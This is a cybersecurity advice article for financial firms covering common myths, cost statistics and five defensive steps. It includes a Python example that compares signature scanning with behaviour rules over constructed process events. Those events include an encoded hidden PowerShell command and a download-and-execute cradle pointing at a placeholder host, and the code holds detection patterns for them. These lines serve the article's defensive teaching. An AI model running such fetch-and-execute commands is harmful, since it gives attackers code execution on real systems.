All businesses are at risk of a cyberattack, and in a period of economic insecurity we expect that risk to increase. The past shows a correlation between economic downturns and cybercrime: before and during the 2008 – 2009 Great Recession, internet fraud increased by 33%, as the broken economy and accelerating digitization left data more exposed than ever.
Even though all organizations are at risk, some industries are more exposed than others. Among the most vulnerable are small businesses, healthcare, government agencies and their contractors, financial institutions, education, and energy and utility companies. Many of these organizations hold large volumes of personal and financial data; others control critical infrastructure. Contractors and service providers are especially attractive because they are a single point of access to data from many client organizations, which is incredibly valuable to cybercriminals.
These attacks take many forms and occur as often as every 11 seconds. The top three threats leaders should worry about are ransomware, phishing, and loss of sensitive data.
Cybersecurity Ventures, the world’s leading researcher and trusted source for cybersecurity facts, figures, and statistics, expects global cybercrime costs to reach $10.5 trillion USD annually by 2025, up from $3 trillion USD in 2015.
This represents the greatest transfer of economic wealth in history, undermines the incentives for innovation and investment, is exponentially larger than the damage inflicted by natural disasters in a year, and will be more profitable than the global trade of all major illegal drugs combined.
Cybercrime costs include damage and destruction of data, stolen money, lost productivity, theft of intellectual property, theft of personal and financial data, embezzlement, fraud, post-attack disruption to the normal course of business, forensic investigation, restoration and deletion of hacked data and systems, and reputational harm.
Fortunately, with vigilant protection, 97% of breaches can be prevented.
Understand the Myths
Many myths surround cybersecurity. Consider these:
- “You’re too small. Why would anyone want to target you?” That’s a myth. Most ransomware and other attacks are indiscriminate. They are carried out at volume and are completely scalable. The attackers blast hundreds of thousands of emails. They think in terms of conversion rate. They don’t know, nor do they care, who it is.
- Assuming you can’t afford enterprise-grade security: the same technical controls, administrative procedures, and other tactics, techniques, and procedures that the Department of Defense and Fortune 10 companies use to protect themselves. Cybersecurity is not expensive. An organization can invest as little as $20-30 a month per device. Compared with average ransomware payouts of over $100,000, and the fact that victims who paid recovered only 65% of their data, that is a small investment.
- Antivirus is good enough. The cold hard truth is that traditional antivirus can only react. It works by comparing files against a list of signatures of known malware. If a piece of malware is new and not yet on that list, there is nothing to match it against, and the user is infected. Many products now add heuristics and behavioural checks, but the signature component still trails the newest threats.
- “We’re covered because we have cybersecurity insurance.” Like all other insurance, this is the last thing you want to rely on to make your firm whole. After a breach, insurance will not restore your reputation. In fact, 60% of small businesses that suffer a cyberattack go out of business within six months.
- Cybersecurity is an IT issue. It’s not. It’s a security issue. IT and infosec are two different disciplines that require two different skillsets.
By understanding that these are myths and the cyberattack risk is real, financial firms can adequately protect themselves and clients from harm.
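The antivirus myth above turns on the difference between matching a file against a list of known hashes and judging what a process actually does. The following Python is an added illustration of that difference, written for this page; it is not code from the author or from IronTech Security. The hash list, the process events, and the rule names are all constructed for the example and stand in for a real signature database and real endpoint telemetry.

```python
"""Signature lookup versus behavioural detection over constructed process events."""
from dataclasses import dataclass
from typing import List, Tuple

# Constructed stand-in for an antivirus signature database: hashes already catalogued.
KNOWN_BAD_HASHES = {"3f9b1e2d" + "0" * 56}


@dataclass
class ProcessEvent:
    parent: str    # parent process image name
    image: str     # full path of the new process image
    cmdline: str   # command line of the new process
    sha256: str    # hash of the executed file


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def signature_scan(ev: ProcessEvent) -> bool:
    """Antivirus-style check: hits only if the exact file hash is already catalogued."""
    return ev.sha256.lower() in KNOWN_BAD_HASHES


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
DOWNLOAD_MARKERS = ("downloadstring", "invoke-webrequest", "start-bitstransfer")


def behaviour_rules(ev: ProcessEvent) -> List[str]:
    """EDR-style checks: judge what the process does, not whether its file is known."""
    hits: List[str] = []
    parent, image = basename(ev.parent), basename(ev.image)
    cmd = ev.cmdline.lower()
    tokens = cmd.split()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office-app-spawned-script-host")
    if image in POWERSHELL and any(t in ENCODED_FLAGS for t in tokens):
        hits.append("encoded-powershell-command")
    if image in POWERSHELL and any(m in cmd for m in DOWNLOAD_MARKERS):
        hits.append("powershell-download-cradle")
    if "\\appdata\\local\\temp\\" in ev.image.lower():
        hits.append("execution-from-temp-directory")
    return hits


def evaluate(events: List[ProcessEvent]) -> List[Tuple[bool, List[str]]]:
    """Per event: (caught by signature?, list of behaviour rules that fired)."""
    return [(signature_scan(ev), behaviour_rules(ev)) for ev in events]


def summarize(events: List[ProcessEvent]) -> Tuple[int, int]:
    """Count events caught by the signature check and by the behaviour rules."""
    results = evaluate(events)
    return (sum(1 for sig, _ in results if sig), sum(1 for _, hits in results if hits))


# Constructed sample events, not real telemetry. Hashes are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe", "a" * 64),
    ProcessEvent("winword.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgA", "b" * 64),
    ProcessEvent("explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/a.ps1')\"", "c" * 64),
    # A dropper whose hash is already catalogued: both approaches catch it.
    ProcessEvent("explorer.exe", r"C:\Users\alice\AppData\Local\Temp\update.exe",
                 "update.exe", "3f9b1e2d" + "0" * 56),
    # The same behaviour from a brand-new build: only the behaviour rule fires.
    ProcessEvent("explorer.exe", r"C:\Users\alice\AppData\Local\Temp\invoice.exe",
                 "invoice.exe", "d" * 64),
]

if __name__ == "__main__":
    for ev, (sig, hits) in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(f"{basename(ev.parent)} -> {basename(ev.image)}: signature={sig} behaviour={hits}")
    print("caught by signature / by behaviour:", summarize(SAMPLE_EVENTS))
```

Run as written, the signature check catches one of the four malicious events while the behaviour rules catch all four, including the recompiled dropper with an unknown hash. Real EDR rules are far more numerous and tuned against false positives, but the principle is the one in the myth: a list of known files cannot flag a file nobody has seen yet.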
5 Steps to Cybersecurity
By taking these five steps financial firms can put in place a comprehensive ongoing cybersecurity program. Here are the steps:
- Realize that cybersecurity is not an IT issue. There is a difference between information security and IT. IT specialists keep networks safe, secure, and running smoothly. A skilled team of information security specialists lives and breathes cybersecurity 24/7: they keep up with changing threats, reveal current risks and vulnerabilities, develop a plan to put security controls in place, and orchestrate the controls, tools, plans, policies, and procedures.
- Do not rely on antivirus alone. In today’s cyber environment it is not enough. Antivirus looks for known malicious code: a signature has to exist before the scanner can match it, so signatures typically trail a new strain by three to six months, and anything not on the list is allowed through. Instead, deploy an endpoint detection and response (EDR) tool. EDR monitors endpoints continuously, analyzes process and network behaviour, and flags malicious activity and anomalies in real time rather than waiting for a signature. Many EDR platforms include a next-generation antivirus engine, so a standalone antivirus product can be retired once EDR is deployed and tuned.
- Learn the importance of encryption. Full-disk encryption is built into most modern devices, including almost all iPads and phones. It renders stored data unreadable to anyone who does not hold the key, so a lost or stolen device does not become a data breach. It should be enabled on every device, with recovery keys stored somewhere other than the device itself. Note that disk encryption protects data at rest only; once a device is unlocked, it does nothing against malware running as the user.
- Multifactor authentication (MFA) is necessary. MFA is an authentication method that requires the user to present two or more verification factors to gain access to a resource such as an application, online account, or VPN. Rather than asking only for a username and password, MFA demands at least one additional factor, such as a one-time code from an authenticator app or a hardware security key, which decreases the likelihood of a successful attack even when the password has been phished or leaked. Factors bound to the site, such as FIDO2 security keys, resist phishing better than SMS or app codes, which an attacker can relay in real time. MFA should be required for remote access to any desktop, server, or data. It is also good practice to use MFA wherever it is available: bank accounts, social media, and e-commerce sites, to name a few.
- Create and foster a security-first environment from the top of the organization down. Employees are your first line of defense against a breach. Everyone who has access to any kind of computer or device on a network must have security awareness training. Continuously. No one is exempt.
A layered security approach with multiple best-of-breed tools and constant vigilance is the most effective line of defense.
Tying it all Together
Cyber risk is constantly evolving. In a technology-driven world, cyber risk is woven into the fabric of society. As the dependence on digital technologies in the business world increases, so does the scope of cyber risk. Cyber threat actors are active adversaries, constantly adapting their tactics, techniques, and procedures to cause harm.
Cyber risk can never be eliminated. Organizations will need to adopt new methods of understanding, measuring, and managing cyber risk on a continuous basis. A combination of cyber insurance and best-in-class cybersecurity practices can reduce this risk and provide some peace of mind for leaders.
About the Author
Tom Kirkham is Founder, CEO and CISO of Kirkham.IT and IronTech Security. Tom founded IronTech Security to focus on cybersecurity defense systems that protect and secure data for the financial, law, and water utility industries. IronTech focuses on educating and encouraging organizations to establish a security-first environment with cybersecurity training programs for all employees to prevent successful attacks. Tom brings more than three decades of software design, network administration, and cybersecurity knowledge to the table. During his career, Tom has received multiple software design awards and founded other acclaimed technology businesses. He is an active member of the FBI’s Arkansas InfraGard Chapter and frequently speaks about the latest in security threats. Tom’s new book, The Cyber Pandemic Survival Guide – Protecting Yourself from the Coming Worldwide Cyber War, was published in July.